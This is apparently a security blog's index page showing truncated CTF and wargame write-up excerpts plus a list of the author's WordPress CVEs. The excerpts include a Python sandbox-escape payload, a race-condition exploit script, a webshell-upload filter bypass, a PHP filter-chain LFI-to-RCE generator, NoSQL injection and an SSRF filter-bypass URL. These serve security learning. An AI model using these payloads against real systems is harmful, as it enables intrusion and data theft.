HACKINTOANETWORK

OFFENSIVE SECURITY RESEARCHER, PENETRATION TESTER

CTF/BYUCTF 2023

Prob inp = input("code> ")[:72] if "__" in inp: print("Nope") else: print(eval(inp, {"__builtins__": {}}, {"__builtins__": {}})) Payload ()._＿class_＿._＿bases_＿[0]._＿subclasses_＿()[124].get_data('.','flag.txt') 이 페이로드는 __ 필터링을 우회하는 방법으로 "_", "＿" 은 다릅니다. 비슷해 보이지만 같지는 않습니다. 전각 문자 ＿는 첫 번째 문자가 아니라 두 번째 문자여야 합니다. 일반 밑줄 다음에 두 번째 유니코드가 오는 경우에만 작동합니다. Exploit from pwn import * p = remote("byuctf.xyz", 40..

2023. 5. 21.

Wargame/Webhacking.kr

Prob 빠르게 요약하자면 위의 코드에서 sleep(1); 때문에 Race Condition 취약점이 발생합니다. Exploit import requests import threading url = "http://webhacking.kr:10019/api.php" found_flag = False headers = { "Cookie": "baby_toctou=645a7c1eda9d3388502911" } def send_request_1(): params = {"q": "cat flag.php"} requests.get(url, headers=headers, params=params) def send_request_2(): global found_flag params = {"q": "ls"} res = ..

2023. 5. 10.

Wargame/Webhacking.kr

Prob You must upload webshell and cat /flag 문제를 보면 다음과 같은 조건을 필터링 합니다. 파일 이름에 .., /, \ 또는 .htaccess가 있는지 확인. 파일의 MIME 타입이 text/로 시작하거나 application/octet-stream인지 확인. Exploit 힌트를 드리자면 코드에서 Content-Type 을 검사하고 있으므로 BurpSuite로 Content-Type을 image/jpeg 로 맞춰주고 filename을 변조 후 이미지 파일 내 페이로드 삽입. FLAG

2023. 5. 9.

Exploit/Bug Bounty

오랜만에 글을 써봅니다 흠냐. 이번 년도 들어오고 워드프레스에서 CVE 따려고 올해 1월인가 작년 12월부터 공부했었는데 드디어 워드프레스 플러그인에서 제로 데이 취약점을 찾을 수 있었습니다 ... 허허 처음 CVE 받았을 땐 엄청 기뻤는데 이제는 CVE 나와도 그런가보다 합니ㅏㄷ .. ㅎㅎ 현재까지 발급받은 CVE 는 다음과 같습니다. CVE (약 60 개 발급 대기 중) CVE-2023-29385 CVE-2023-29441 CVE-2023-30471 CVE-2023-30472 CVE-2023-30487 CVE-2023-30493 CVE-2023-30499 CVE-2023-30779 CVE-2023-30871 CVE-2023-30473 CVE-2023-31071 CVE-2023-30868 CVE-202..

2023. 5. 2.

Wargame/Dreamhack

Vulnerability Analysis def modify_article(): check_session() article_id = request.form['article_id'] # Show unrecognizable article edit page for non-admin users. if session['username'] != 'admin': if 'title' not in request.form or 'content' not in request.form: return render_template('modify_article.html', article_id=article_id, content='*' * 1390, title='*' * 39) return redirect('/board/{0}'.fo..

2023. 3. 30.

Wargame/Webhacking.kr

Prob 이 문제는 LFI 를 통해 RCE를 트리거 시켜 flag.txt를 읽어 올 수 있었다. Exploit php 필터를 사용하여 임의의 콘텐츠를 출력으로 생성할 수 있다. 이는 파일에 작성할 필요 없이 임의의 PHP 코드를 생성 및 실행 할 수 있음을 의미한다. (스스로의 실력 향상을 위해 풀 익스는 제공하지 않겠습니다..) GitHub - synacktiv/php_filter_chain_generator Contribute to synacktiv/php_filter_chain_generator development by creating an account on GitHub. github.com Flag

2023. 3. 29.

Exploit/Exploit

php 필터를 사용하여 임의의 콘텐츠를 출력으로 생성할 수 있다. 이는 파일에 작성할 필요 없이 임의의 PHP 코드를 생성 할 수 있음을 의미한다. #!/usr/bin/env python3 import argparse import base64 import re # - Useful infos - # https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters # https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT # https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d # No need to guess a vali..

2023. 3. 29.

CTF/Incognito 4.0

To summarize this CTF challenge, it could be solved by performing a NoSQL injection attack. The challenge provided a login and registration feature, as well as a functionality to check the existence of an email and whether an account had admin privileges. The ultimate goal of the challenge was to log in with an admin account, so I had to find an account with "isAdmin" set to true. Payload import..

2023. 2. 19.

CTF/Incognito 4.0

This CTF challenge is an SSRF challenge with some additional filtering compared to the "get flag1" challenge that was previously solved. The challenge provides a URL form where a user can input a URL, and the goal is to bypass the filtering and trigger an SSRF attack. Payload http://0x7f.0x00.0x00.0x01:9001/flag.txt The payload used to trigger the SSRF attack is the URL "http://0x7f.0x00.0x00.0x..

2023. 2. 19.